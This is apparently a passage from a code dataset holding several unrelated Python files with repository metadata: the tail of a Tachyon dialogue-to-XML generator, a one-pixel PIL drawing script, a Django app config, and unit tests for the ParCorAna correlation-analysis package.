raise TypeError(f"parse_event called on {item}")
pos += 1
while pos < len(section):
item = section[pos]
if type(item) is Condition:
event.conditions.append(item)
elif type(item) is SpawnNPC:
pos, npc = parse_npc(pos, section)
event.npcs.append(npc)
continue
elif type(item) is AddDebris:
pos, debris = parse_debris(pos, section)
event.debris.append(debris)
continue
elif type(item) is AddShip:
pos, ship = parse_ship(pos, section)
event.ships.append(ship)
continue
else:
break
pos += 1
return pos, event
def parse_events(section):
"""Parse event objects and modifiers"""
pos = 0
events = []
while pos < len(section):
item = section[pos]
if type(item) is EventDef:
pos, event = parse_event(pos, section)
events.append(event)
else:
msg = f"Unkown item type {item.__class__.__name__}"
raise ParseError(msg, pos, section)
return events
def parse_message(pos, section):
"""Parse message with associated modifiers"""
mid = Auto
if type(section[pos]) is Label:
if pos == len(section):
msg = "Label is not allowed at the end of a section"
raise ParseError(msg, pos, section)
mid = section[pos].id
pos += 1
if type(section[pos]) is str:
message = ParsedMessage(mid, section[pos])
pos += 1
elif type(section[pos]) is Choice:
choices = []
for content in section[pos].choices:
try:
subpos, reply = parse_reply(0, content)
_, subsection = parse_dialogue(subpos, content)
except ParseError as err:
err.parents.append((pos, section))
raise err
except Exception as exc:
msg = (
f"Exception while parsing this section:"
f" {exc.__class__.__name__}: {exc}"
)
raise ParseError(msg, pos, section)
else:
choices.append((reply, subsection))
message = ParsedMessage(mid, section[pos].text)
message.choices.extend(choices)
pos += 1
elif mid is not Auto:
msg = f"{section[pos].__class__.__name__} is not allowed after a Label"
raise ParseError(msg, pos, section)
else:
raise TypeError(f"parse_message called on {section[pos]}")
while pos < len(section):
item = section[pos]
if item is End:
message.next = None
elif type(item) is Goto:
message.next = item.target
elif type(item) is Event:
message.events.append(item)
elif type(item) is Reply:
if item.params:
msg = "Reply not part of choice can't have params"
raise ParseError(msg, pos, section)
if message.response is not Auto:
raise ParseError("Reply cannot be chained", pos, section)
message.response = item.text
elif type(item) is InlineEvent:
pos, event = parse_event(pos, section)
message.events.append(event)
continue
else:
break
pos += 1
return pos, message
def parse_dialogue(pos, section):
"""Parse message objects and modifiers"""
if isinstance(section, tuple):
msg = f"Expected section but got tuple, content: {section}"
raise ParseError(msg, pos, None)
dialogue = []
while pos < len(section):
item = section[pos]
if type(item) in [Label, Choice, str]:
pos, message = parse_message(pos, section)
dialogue.append(message)
continue
elif type(item) in [Condition, EndType, Goto, Event, Reply]:
msg = f"{item.__class__.__name__} is not allowed here"
raise ParseError(msg, pos, section)
else:
msg = f"Unkown item type {item.__class__.__name__}"
raise ParseError(msg, pos, section)
pos += 1
return pos, dialogue
def assign_ids(section, mid_gen, ename_gen):
"""Assign ids for messages, replies and events that has Auto as the id"""
for item in section:
if item.id is Auto:
item.id = next(mid_gen)
for event in item.events:
if type(event) is ParsedEvent and event.name is Auto:
event.name = next(ename_gen)
# If there are more than 9 choices, R10 will sort before R2
if len(item.choices) > 9:
rid_gen = map("R{:02}".format, count(1))
else:
rid_gen = map("R{}".format, count(1))
for reply, sub in item.choices:
if reply.id is Auto:
reply.id = next(rid_gen)
assign_ids(sub, mid_gen, ename_gen)
def resolve(section, end=None):
"""Resolve next, target and reply text references that are set to Auto"""
for i, item in enumerate(section):
if item.next is Auto:
item.next = section[i+1].id if i+1 < len(section) else end
for reply, sub in item.choices:
if reply.target is Auto:
reply.target = sub[0].id if sub else item.next
if reply.text is Auto:
reply.text = item.response
resolve(sub, end=item.next)
def separate_events(message):
"""Separate event calls from event definitions in a message"""
calls = []
defs = []
for event in message.events:
if type(event) is Event:
calls.append(event)
elif type(event) is ParsedEvent:
calls.append(Event(event.name, event.target))
defs.append(event)
else:
assert False, "Should not be possible"
return calls, defs
def flatten(section):
"""Creates a flat representation of a processed section"""
output = []
events = []
for item in section:
assert type(item) is ParsedMessage, "Should not be possible"
event_calls, event_defs = separate_events(item)
events.extend(event_defs)
replies = []
sub_outputs = []
if item.choices:
for reply, sub in item.choices:
replies.append(FlatReply(
reply.id, reply.target, reply.text,
reply.conditions, reply.params
))
sub_output, sub_defs = flatten(sub)
sub_outputs.extend(sub_output)
events.extend(sub_defs)
elif item.response is not Auto or item.next is not None:
replies.append(FlatReply('R1', item.next, item.response, [], {}))
output.append(FlatMessage(item.id, item.text, replies, event_calls))
output.extend(sub_outputs)
return output, events
SERVER_VAR_TYPES = [
"SERVER_VARIABLE_PRESENT",
"SERVER_VARIABLE_ABSENT",
]
def xml_params(node, param_node_name, params):
"""Add possibly duplicated params to node"""
for key, value in params.items():
if type(value) is list:
for item in value:
if type(item) is int:
item = str(item)
SubElement(node, param_node_name, {key: item})
else:
if type(value) is int:
value = str(value)
node.set(key, value)
def xml_conditions(node, node_name, conditions, options):
"""Add xml condition and condition_param nodes from condition list"""
for condition in conditions:
if condition.type in SERVER_VAR_TYPES:
if (
options['mangle_any_value']
and 'any_value' in condition.params
and 'var_value' not in condition.params
):
condition.params['var_value'] = '1'
if (
options['mangle_empty_value']
and 'any_value' not in condition.params
and 'var_value' not in condition.params
):
index = 1 - SERVER_VAR_TYPES.index(condition.type)
condition = condition._replace(type=SERVER_VAR_TYPES[index])
condition_node = SubElement(node, node_name, type=condition.type)
xml_params(condition_node, 'condition_param', condition.params)
def xml_messages(node, messages, options):
"""Add xml message nodes to dialog node from flat message list"""
for msg in messages:
msg_node = SubElement(node, 'message', id=msg.id, text=msg.text)
for event in msg.events:
SubElement(msg_node, 'event', id=event.id, target=event.target)
for reply in msg.replies:
text = auto(reply.text, options['default_response'])
reply_node = SubElement(msg_node, 'reply', id=reply.id, text=text)
if reply.target is not None:
reply_node.set('next', reply.target)
for key, value in reply.params.items():
if type(value) is int:
value = str(value)
reply_node.set(key, value)
xml_conditions(reply_node, 'condition', reply.conditions, options)
def xml_dialogues(dialogues, options):
"""Create dialogues node from diagen dialogue mapping"""
mid_gen = map("M{}".format, count())
dialogues_node = Element('dialogues')
extra_events = []
for name, section in dialogues.items():
ename_gen = map(f"{name}_E{{}}".format, count())
try:
_, section = parse_dialogue(0, section)
except ParseError as err:
err.parents.append((name, None))
raise err
assign_ids(section, mid_gen, ename_gen)
resolve(section)
messages, events = flatten(section)
if not messages:
raise ValueError(f"'{name}' has no messages")
extra_events.extend(events)
dialogue_node = SubElement(dialogues_node, 'dialogue', name=name)
start_node = SubElement(dialogue_node, 'start')
start_node.text = messages[0].id
xml_messages(dialogue_node, messages, options)
return dialogues_node, extra_events
def xml_ai(node, prefix, ais, options):
"""Create ai nodes with conditions from list of ais"""
for ai in ais:
ai_node = SubElement(node, f'{prefix}', type=ai.type)
xml_params(ai_node, f'{prefix}_param', ai.params)
xml_conditions(ai_node, f'{prefix}_conditions', ai.conditions, options)
def xml_npcs(node, node_name, npcs, options):
"""Create npc nodes with ais from list of npcs"""
for npc in npcs:
npc_node = SubElement(node, node_name)
params = {f'npc_{k}': v for k, v in npc.params.items()}
xml_params(npc_node, 'npc_param', params)
xml_ai(npc_node, 'npc_ai', npc.ais, options)
def xml_events(events, options):
"""Create event nodes with ships, npcs and debris from list of npcs"""
events_node = Element('events')
for event in events:
event_node = SubElement(
events_node, 'event', type=event.type, name=event.name
)
xml_params(event_node, 'event_param', event.params)
xml_conditions(event_node, 'condition', event.conditions, options)
xml_npcs(event_node, 'spawn_npc', event.npcs, options)
for ship in event.ships:
ship_node = SubElement(event_node, 'add_ship')
xml_params(ship_node, 'ship_param', ship.params)
xml_ai(ship_node, 'ship_ai', ship.ais, options)
xml_npcs(ship_node, 'spawn_npc_on_ship', ship.npcs, options)
for debris in event.debris:
debris_node = SubElement(event_node, 'add_debris')
xml_params(debris_node, 'debris_param', debris.params)
for item in debris.items:
item_node = SubElement(debris_node, 'debris_item')
xml_params(item_node, 'debris_item_param', item.params)
return events_node
def debug_format(item, indent=0):
"""Format a pretty representation of a processed section"""
if type(item) is ParsedMessage:
return "\n".join([
f"{' '*indent}<ParsedMessage id={item.id!r} text={item.text!r}"
f" next={item.next!r} response={item.response!r}"
f" events={item.events} choices=["
] + [debug_format(c, indent+4) + ',' for c in item.choices] + [
f"{' '*indent}]>"
])
if type(item) is ParsedReply:
return (
f"{' '*indent}<ParsedReply id={item.id!r} target={item.target!r}"
f" text={item.text!r} conditions={item.conditions}"
f" params={item.params}>"
)
if type(item) is list:
return "\n".join([
f"{' '*indent}[",
] + [debug_format(sub, indent+4) + ',' for sub in item] + [
f"{' '*indent}]"
])
if type(item) is tuple:
return "\n".join([
f"{' '*indent}(",
] + [debug_format(sub, indent+4) + ',' for sub in item] + [
f"{' '*indent})"
])
return ' ' * indent + repr(item)
def format_pos(pos, section):
"""Formats the last entries before pos with an arrow point at pos"""
if section is None:
return f">{pos:3}: Unkown"
parts = []
for i in range(max(pos - 2, 0), pos + 1):
if type(section[i]) is Choice:
content = f"Choice({section[i].text!r}, ...)"
else:
content = repr(section[i])
parts.append(f"{'>' if i == pos else ' '}{i:3}: {content}")
return "\n".join(parts)
def format_parse_error(err):
"""Formats a parse error into a traceback like message"""
parts = []
parts.append(format_pos(err.pos, err.section))
for pos, section in err.parents:
if type(pos) is int:
parts.insert(0, "in subsection")
parts.insert(0, format_pos(pos, section))
else:
parts.insert(0, f"in dialogue '{pos}'")
parts.append(f"ParseError: {err.msg}")
return "\n".join(parts)
def xml_pretty(node, indent=0):
"""Indents and spreads out compact nodes representaions over lines"""
if len(node):
text = node.text if node.text is not None else ""
node.text = f"\n{' ' * (indent + 1)}{text}"
for i, sub in enumerate(node):
tail = sub.tail if sub.tail is not None else ""
sub.tail = f"\n{' ' * (indent + (i < len(node)-1))}{tail}"
xml_pretty(sub, indent+1)
def main():
"""Parse command line argements and do dialogue generation"""
from argparse import ArgumentParser
from pathlib import Path
import sys
def error(message, code=1):
"""Print message to stderr and exit with code"""
print(message, file=sys.stderr)
exit(code)
def handle_open(path, out):
"""Opens path as output if out otherwise as input"""
if path == "-":
return sys.stdout if out else sys.stdin
try:
return open(path, 'x' if out else 'r')
except OSError as err:
error(f"Error opening {path}: {err}")
options = {
'default_response': "[SKIP]...",
'mangle_any_value': False,
'mangle_empty_value': True,
}
parser = ArgumentParser(description="Generate Tachyion dialogue XML")
parser.add_argument(
'script', help="Script file containing the dialogues definition"
)
parser.add_argument(
'output', nargs='?', default=None,
help="Output file, defaults to script name with an xml extension"
)
parser.add_argument(
'events', nargs='?', default=None,
help="Events file, defaults to script name + _events with an xml"
" extension"
)
args = parser.parse_args()
if args.output is None:
args.output = Path(args.script).with_suffix('.xml')
if args.events is None:
args.events = Path(args.script)
args.events = args.events.with_name(f'{args.events.stem}_events.xml')
in_file = handle_open(args.script, False)
out_file = handle_open(args.output, True)
script_vars = {k: v for k, v in globals().items() if k in __all__}
exec(in_file.read(), script_vars)
if 'dialogues' not in script_vars:
error(f"Script does not set the dialogues variable", 2)
dialogues = script_vars['dialogues']
events = script_vars.get('events', [])
options.update(script_vars.get('diagen_options', {}))
try:
root, extra_events = xml_dialogues(dialogues, options)
except ParseError as err:
error(format_parse_error(err))
root.insert(0, Comment(" Generated by diagen.py "))
xml_pretty(root)
root.tail = "\n"
document = ElementTree(root)
document.write(out_file, encoding="unicode", xml_declaration=True)
if events or extra_events:
try:
events = parse_events(events)
except ParseError as err:
msg = format_parse_error(err)
error("\n".join(["in events section", msg]))
events.extend(extra_events)
event_file = handle_open(args.events, True)
event_root = xml_events(events, options)
event_root.insert(0, Comment(" Generated by diagen.py "))
xml_pretty(event_root)
event_root.tail = "\n"
event_document = ElementTree(event_root)
event_document.write(
event_file, encoding="unicode", xml_declaration=True
)
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | noreply@github.com |
cb95a5fcb3ae98cc0e7079624eee3ff7610c7d5d | e1471e31e13460912f1e65528e996120c1bcde49 | /draw-pixel/draw-pixel.py | ce7c152fdd2fcd655ca056bd00204e2fe929a4c9 | [] | no_license | Kranthos/PIL-python | db0dd8b317a2f67cc61e4ebdb16348777a0d995a | 6dd15c22ba64ae59cf258d20e8273ce05f690cd6 | refs/heads/main | 2023-06-02T09:43:28.414111 | 2021-06-21T14:43:26 | 2021-06-21T14:43:26 | 376,350,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | from PIL import Image
im = Image.new(mode="RGBA", size=(50,50), color=(255,255,255,255))
im.putpixel((25,25), (0,0,0,255))
im.show()
im.save("pixel.png") | [
"ekranthos@gmail.com"
] | ekranthos@gmail.com |
058258ee3d0ec5cbba5e415fadbcea87d45b8a9d | a1c6fea0703d7d813a88aae91a7fbb17e06785ea | /third_admin/apps.py | daa061129e27bc5023c0d553c5287f0a2b872cb2 | [] | no_license | warm200/SpokesTribe | bea676b2868272ceab17176d7eb5d98ae7747543 | 8c3671214e317987645aeef4451e590bcb772f7e | refs/heads/master | 2022-01-11T18:12:40.847007 | 2019-02-08T13:08:38 | 2019-02-08T13:08:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | from django.apps import AppConfig
class ThirdAdminConfig(AppConfig):
name = 'third_admin'
| [
"zhengyufei19999@163.com"
] | zhengyufei19999@163.com |
525eb46142e733dea7a957256215fb27fe14dbe9 | 786de89be635eb21295070a6a3452f3a7fe6712c | /ParCorAna/tags/V00-00-08/src/unitTestsParCorAna.py | 2f089c31ef0f1ccbdfde74ff8e947a820923c7ba | [] | no_license | connectthefuture/psdmrepo | 85267cfe8d54564f99e17035efe931077c8f7a37 | f32870a987a7493e7bf0f0a5c1712a5a030ef199 | refs/heads/master | 2021-01-13T03:26:35.494026 | 2015-09-03T22:22:11 | 2015-09-03T22:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,144 | py | #--------------------------------------------------------------------------
# Description:
# Test script for ParCorAna
#
#------------------------------------------------------------------------
#--------------------------------
# Imports of standard modules --
#--------------------------------
import sys
import os
import logging
#import stat
import tempfile
import unittest
from cStringIO import StringIO
#import subprocess as sb
#import collections
#import math
import numpy as np
import h5py
import glob
import shutil
#-----------------------------
# Imports for other modules --
#-----------------------------
import psana
from AppUtils.AppDataPath import AppDataPath
import psana_test.psanaTestLib as ptl
#import h5py
#import psana_test.psanaTestLib as ptl
import ParCorAna as corAna
### helper function
def runCmd(cmd, verbose=True):
o,e,retcode = ptl.cmdTimeOutWithReturnCode(cmd)
if verbose: print "--- ran cmd: %s" % cmd
if verbose: print "output=%s\n\nerror=%s" % (o,e)
if verbose: print "return code=%r" % retcode
return retcode
def removeAllInProgressFromParentDir(fname):
basedir, basename = os.path.split(fname)
assert len(basedir)>0 and os.path.exists(basedir)
inProgressFiles = glob.glob(os.path.join(basedir, "*.inprogress"))
for inProgress in inProgressFiles:
os.unlink(inProgress)
def unindent(x):
def numSpacesStart(ln):
n=0
while len(ln)>0 and ln[0]==' ':
ln = ln[1:]
n+= 1
return n
lns = x.split('\n')
allLeadingSpaces = [numSpacesStart(ln) for ln in lns if len(ln.strip())>0]
minLeadingSpaces = min(allLeadingSpaces)
return '\n'.join([ln[minLeadingSpaces:] for ln in lns])
class FormatFileName( unittest.TestCase ) :
def setUp(self) :
"""
Method called to prepare the test fixture. This is called immediately
before calling the test method; any exception raised by this method
will be considered an error rather than a test failure.
"""
self.longMessage = True
destDirBase = AppDataPath(os.path.join("ParCorAna","testingDir")).path()
self.tempDestDir = tempfile.mkdtemp(dir=destDirBase)
def tearDown(self) :
"""
Method called immediately after the test method has been called and
the result recorded. This is called even if the test method raised
an exception, so the implementation in subclasses may need to be
particularly careful about checking internal state. Any exception raised
by this method will be considered an error rather than a test failure.
This method will only be called if the setUp() succeeds, regardless
of the outcome of the test method.
"""
shutil.rmtree(self.tempDestDir, ignore_errors=True)
def test_formatFileName(self):
fname = os.path.join(self.tempDestDir, "file.h5")
fname_w_T = os.path.join(self.tempDestDir, "file_%T.h5")
fname_w_C = os.path.join(self.tempDestDir, "file_%C.h5")
fname_other = os.path.join(self.tempDestDir, "file_jnk.h5")
self.assertEqual(corAna.formatFileName(fname),fname)
tmfname = corAna.formatFileName(fname_w_T)
os.system('touch %s' % tmfname)
self.assertNotEqual(tmfname,fname)
# %C 2015 05 05 16 19 59
self.assertEqual(len(tmfname),len(fname_w_T)-2 +4 +2 +2 +2 +2 +2, msg="tmfname=%s" % tmfname)
os.system('touch %s' % fname)
os.system('touch %s' % tmfname)
c0 = corAna.formatFileName(fname_w_C)
self.assertNotEqual(c0,fname)
self.assertEqual(c0, fname_w_C.replace('%C','000'))
os.system('touch %s' % c0)
c1 = corAna.formatFileName(fname_w_C)
self.assertEqual(c1, fname_w_C.replace('%C','001'))
os.system('touch %s' % c1)
os.system('touch %s' % fname_other)
c2 = corAna.formatFileName(fname_w_C)
self.assertEqual(c2, fname_w_C.replace('%C','002'))
class ParCorAna( unittest.TestCase ) :
def setUp(self) :
"""
Method called to prepare the test fixture. This is called immediately
before calling the test method; any exception raised by this method
will be considered an error rather than a test failure.
"""
self.longMessage = True
def tearDown(self) :
"""
Method called immediately after the test method has been called and
the result recorded. This is called even if the test method raised
an exception, so the implementation in subclasses may need to be
particularly careful about checking internal state. Any exception raised
by this method will be considered an error rather than a test failure.
This method will only be called if the setUp() succeeds, regardless
of the outcome of the test method.
"""
pass
def test_parseDataSetString(self):
'''test parseDataSetString function
'''
dsOpts = corAna.parseDataSetString('exp=amo123:run=12')
self.assertEqual(dsOpts['exp'],'amo123')
self.assertEqual(dsOpts['run'],[12])
self.assertEqual(dsOpts['h5'],False)
self.assertEqual(dsOpts['xtc'],True)
self.assertEqual(dsOpts['live'],False)
self.assertEqual(dsOpts['shmem'],False)
def test_noConfig(self):
system_params = {}
user_params = {}
test_alt = False
self.assertRaises(AssertionError, corAna.CommSystemFramework, system_params, user_params, test_alt)
def test_logger(self):
msg1 = 'hi there'
msg2 = 'what?'
try:
stdout = sys.stdout
stderr = sys.stderr
sys.stdout = StringIO()
sys.stderr = StringIO()
self.assertRaises(AssertionError, corAna.makeLogger, False, True, True, True, 0, 'INFO', False)
l = corAna.makeLogger( False, True, False, False, 0, 'INFO', False)
l2 = corAna.makeLogger( False, True, False, False, 0, 'INFO', False) # make sure getting another ref doesn't double handlers
l.info(msg1)
l.warning(msg2)
except Exception,e:
sys.stdout = stdout
sys.stderr = stderr
raise e
stderrLns = [ln for ln in sys.stderr.getvalue().split('\n') if len(ln.strip())>0]
stdoutLns = [ln for ln in sys.stdout.getvalue().split('\n') if len(ln.strip())>0]
sys.stderr.close()
sys.stdout.close()
sys.stdout = stdout
sys.stderr = stderr
self.assertEqual(len(stderrLns),2)
self.assertEqual(len(stdoutLns),0)
self.assertTrue(stderrLns[0].find('INFO')>0 and stderrLns[0].find(msg1)>0, msg='log ln=%s does not have INFO nor %s in it' % (stderrLns[0], msg1))
self.assertTrue(stderrLns[1].find('WARNING')>0 and stderrLns[1].find(msg2)>0, msg='log ln=%s does not have WARNING nor %s in it' % (stderrLns[1], msg2))
class Cspad2x2( unittest.TestCase ) :
'''Test on small cspad2x2
'''
def setUp(self) :
"""
Method called to prepare the test fixture. This is called immediately
before calling the test method; any exception raised by this method
will be considered an error rather than a test failure.
"""
pass
dataDir = os.path.join(ptl.getMultiFileDataDir(), 'test_013_xcsi0314')
experiment = 'xcsi0314'
run = 178
maskColorDir = os.path.join(dataDir, 'maskColorDir')
maskFileBaseName = '%s-r%d_XcsEndstation_0_Cspad2x2_0_mask_ndarrCoords.npy' % (experiment, run)
testMaskFileBaseName = '%s-r%d_XcsEndstation_0_Cspad2x2_0_testmask_ndarrCoords.npy' % (experiment, run)
colorFileBaseName = '%s-r%d_XcsEndstation_0_Cspad2x2_0_color_ndarrCoords.npy' % (experiment, run)
maskFile = os.path.join(maskColorDir, maskFileBaseName)
testMaskFile = os.path.join(maskColorDir, testMaskFileBaseName)
colorFile = os.path.join(maskColorDir, colorFileBaseName)
assert os.path.exists(maskFile), "mask file %s doesn't exist" % maskFile
assert os.path.exists(testMaskFile), "test maskfile %s doesn't exist" % testMaskFile
assert os.path.exists(colorFile), "color file %s doesn't exist" % colorkFile
numServers = 1
# make a random directory for the testing that we will remove when done
destDirBase = AppDataPath(os.path.join("ParCorAna","testingDir")).path()
assert len(destDirBase)>0, "did not find testingDir base dir in the ParCorAna data dir"
# tempDestDir = tempfile.mkdtemp(dir=destDirBase)
tempDestDir = os.path.join(destDirBase, "mytest") # DVD REMOVE
if not os.path.exists(tempDestDir): os.mkdir(tempDestDir)
h5outputBaseName = 'g2calc_cspad2x2_%%s_%s-r%4.4d.h5' % (experiment, run) # has %%s for for testName
testH5outputBaseName = 'test_' + h5outputBaseName
h5outputFile = os.path.join(tempDestDir, h5outputBaseName)
testH5outputFile = os.path.join(tempDestDir, testH5outputBaseName)
removeAllInProgressFromParentDir(h5outputFile)
userClass = '--TESTS-MUST-FILL-THIS-IN--'
testName = '--TESTS-MUST-FILL-THIS-IN--'
numTimes = 100 # test data only has 60 events
delays = [1, 2, 3, 5, 7, 10, 15, 23, 34, 50]
self.formatDict = locals().copy()
self.numEvents = 60 # There are 60 events in the test data.
# these 60 events go from fiducials 33132 -> 33312, they go by 3 *except* that they skip
# fiducial 33300. So as 120hz counter times, these go from 1 to 61 and they skip 57.
# the number of delay counts we'll get will be 60-delay for delays > 4
# and 59-delay for delays <=4.
def expectedDelay(delay):
if delay > 4: return 60 - delay
return 59-delay
self.expectedCounts = [expectedDelay(delay) for delay in delays]
# Here are commands to see this:
# eventCountCmd = 'psana -m PrintEventId %s/e*-r%4.4d*.xtc | grep fiducials | grep -v "fiducials=131071" | wc' % (self.dataDir, self.run)
# evtCountOut, evtCountErr = ptl.cmdTimeOut(eventCountCmd)
# numEventsFromCmd = int(evtCountOut.split()[0])
# self.assertEqual(numEvents, numEventsFromCmd, "ran cmd=%s expected to get %d events, but got %d" % (eventCountCmd, numEvents, numEventsFromCmd))
self.tempDestDir = tempDestDir
self.dataDir = dataDir
self.run = run
self.configFileContent='''
import psana
import numpy as np
import ParCorAna as corAna
system_params = {{}}
system_params['dataset'] = 'exp={experiment}:run={run}:dir={dataDir}'
system_params['src'] = 'DetInfo(XcsEndstation.0:Cspad2x2.0)'
system_params['psanaType'] = psana.CsPad2x2.ElementV1
system_params['ndarrayProducerOutKey'] = 'ndarray'
system_params['ndarrayCalibOutKey'] = 'calibrated'
system_params['psanaOptions'], system_params['outputArrayType'] = \\
corAna.makePsanaOptions(srcString=system_params['src'],
psanaType=system_params['psanaType'],
ndarrayOutKey=system_params['ndarrayProducerOutKey'],
ndarrayCalibOutKey=system_params['ndarrayCalibOutKey'])
system_params['workerStoreDtype']=np.float32
system_params['maskNdarrayCoords'] = '{maskFile}'
system_params['testMaskNdarrayCoords'] = '{testMaskFile}'
system_params['numServers'] = {numServers}
system_params['serverHosts'] = None # None means system selects which hosts to use (default).
system_params['times'] = {numTimes}
system_params['update'] = 0
system_params['delays'] = {delays}
testName = '{testName}'
system_params['h5output'] = '{h5outputFile}' % testName
system_params['testH5output'] = '{testH5outputFile}' % testName
system_params['overwrite'] = True
system_params['verbosity'] = 'INFO'
system_params['numEvents'] = 0
system_params['testNumEvents'] = 0
import ParCorAna.UserG2 as UserG2
system_params['userClass'] = {userClass}
user_params = {{}}
user_params['colorNdarrayCoords'] = '{colorFile}'
user_params['saturatedValue'] = (1<<15)
user_params['LLD'] = 1E-9
user_params['notzero'] = 1E-5
user_params['psmon_plot'] = False
'''
def tearDown(self) :
"""
Method called immediately after the test method has been called and
the result recorded. This is called even if the test method raised
an exception, so the implementation in subclasses may need to be
particularly careful about checking internal state. Any exception raised
by this method will be considered an error rather than a test failure.
This method will only be called if the setUp() succeeds, regardless
of the outcome of the test method.
"""
pass
# shutil.rmtree(self.tempDestDir, ignore_errors=True) DVD REMOVE
def test_FilesSame(self):
'''
check that the input files haven't changed
'''
md5sums={'maskColorDir/xcsi0314-r178_XcsEndstation_0_Cspad2x2_0_color_ndarrCoords.npy': 'dad6ebe25b364eeea4114c036b54ea4c',
'maskColorDir/xcsi0314-r178_XcsEndstation_0_Cspad2x2_0_mask_ndarrCoords.npy': '9b8ade01f93fc087228c15cad9944856',
'maskColorDir/xcsi0314-r178_XcsEndstation_0_Cspad2x2_0_testmask_ndarrCoords.npy': '282715e77fb5e4247a6b0851f3b244ea',
'e524-r0178-s00-c00.xtc': 'b73a43ee4393c8c793d430f951cad021',
'e524-r0178-s01-c00.xtc': 'eee2248370bef1a94202d5d6afd89799',
'e524-r0178-s02-c00.xtc': 'd340d899c5ab36f34b75df419af3b711',
'e524-r0178-s03-c00.xtc': '111d1ab55c6bbb685bea7d5501587e1d',
'e524-r0178-s04-c00.xtc': '18fcbc6eec20d2a94f31750f49dc1bda',
'e524-r0178-s05-c00.xtc': '9d87909f0c613ca6433fc94d0985521d'
}
for fname, prev_md5 in md5sums.iteritems():
fullFname = os.path.join(self.dataDir,fname)
assert os.path.exists(fullFname)
cur_md5 = ptl.get_md5sum(fullFname)
self.assertEqual(cur_md5, prev_md5, msg="md5 has changed for %s. old=%s new=%s" % \
(fullFname, prev_md5, cur_md5))
def writeConfigFile(self, configname):
configFileName = os.path.join(self.tempDestDir, configname)
configFile = file(configFileName, 'w')
configFile.write(unindent(self.configFileContent.format(**self.formatDict)))
configFile.close()
return configFileName
def checkDelays(self, h5fileName, delays, expectedCounts):
h5file = h5py.File(h5fileName,'r')
systemDelays = list(h5file['system/system_params/delays'][:])
userDelays = list(h5file['user/G2_results_at_000060/delays'][:])
self.assertListEqual(delays, systemDelays, msg='delays written to config != system delays')
self.assertListEqual(systemDelays, userDelays, msg="in h5 output file, system and user section do not have same delays")
counts = list(h5file['user/G2_results_at_000060/delay_counts'][:])
self.assertEqual(len(counts), len(expectedCounts))
self.assertListEqual(counts, expectedCounts, msg="delay counts wrong.\nAns=%r\nRes=%r\nDly=%r" % \
(expectedCounts, counts, list(delays)))
def test_G2atEnd(self):
self.formatDict['userClass']='UserG2.G2atEnd'
testName = 'atEnd'
self.formatDict['testName'] = testName
configFileName = self.writeConfigFile('config_G2atEnd.py')
cmd = 'mpiexec -n 4 parCorAnaDriver --test_main -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
# check delays
h5outputFile = self.formatDict['h5outputFile'] % testName
self.checkDelays(h5outputFile , self.formatDict['delays'], self.expectedCounts)
cmd = 'parCorAnaDriver --test_alt -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
cmd = 'parCorAnaDriver --cmp -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="error running %s - files must differ" % cmd)
def test_G2IncrementalAccumulator(self):
self.formatDict['userClass']='UserG2.G2IncrementalAccumulator'
testName = 'incrAccum'
self.formatDict['testName'] = testName
configFileName = self.writeConfigFile('config_G2IncrementalAccumulator.py')
cmd = 'mpiexec -n 4 parCorAnaDriver --test_main -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
# check delays
h5outputFile = self.formatDict['h5outputFile'] % testName
self.checkDelays(h5outputFile, self.formatDict['delays'], self.expectedCounts)
cmd = 'parCorAnaDriver --test_alt -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
cmd = 'parCorAnaDriver --cmp -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="error running %s - files must differ" % cmd)
def test_G2Window(self):
self.formatDict['userClass']='UserG2.G2IncrementalWindowed'
testName = 'windowa'
self.formatDict['testName'] = testName
self.formatDict['numTimes'] = 20 # 60 events, so we will get a smaller window
delays = self.formatDict['delays']
self.assertListEqual(delays,[1,2,3,5,7,10,15,23,34,50])
# --- the twenty fiducials we will have will effectively look like
# 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 -- 18 19 20 21
self.expectedCounts = [ 18, 17, 16, 15, 13, 10, 5, 0, 0, 0]
configFileName = self.writeConfigFile('config_G2windoweda.py')
cmd = 'mpiexec -n 4 parCorAnaDriver --test_main -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
# check delays
h5outputFile = self.formatDict['h5outputFile'] % testName
self.checkDelays(h5outputFile, self.formatDict['delays'], self.expectedCounts)
cmd = 'parCorAnaDriver --test_alt -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
cmd = 'parCorAnaDriver --cmp -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="error running %s - files must differ" % cmd)
# we expect windowed incremental to produce the same result as G2 at end with a small numTimes
self.formatDict['userClass']='UserG2.G2atEnd'
self.formatDict['testName'] = 'windowedb'
configFileName = self.writeConfigFile('config_G2windowedb.py')
cmd = 'mpiexec -n 4 parCorAnaDriver --test_main -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
h5A = h5outputFile
h5B = self.formatDict['h5outputFile'] % testName
cmd = 'cmpParCorAnaH5OutputPy %s %s' % (h5A, h5B)
print "running cmd=%s" % cmd
o,e,retcode = ptl.cmdTimeOutWithReturnCode(cmd)
print "stdout=%s\nstderr=%s" % (o,e)
self.assertEqual(0, retcode, msg="comparing windowed to atEnd with numTimes=%d failed" % self.formatDict['numTimes'])
if __name__ == "__main__":
unittest.main(argv=[sys.argv[0], '-v'])
| [
"davidsch@SLAC.STANFORD.EDU@b967ad99-d558-0410-b138-e0f6c56caec7"
] | davidsch@SLAC.STANFORD.EDU@b967ad99-d558-0410-b138-e0f6c56caec7 |
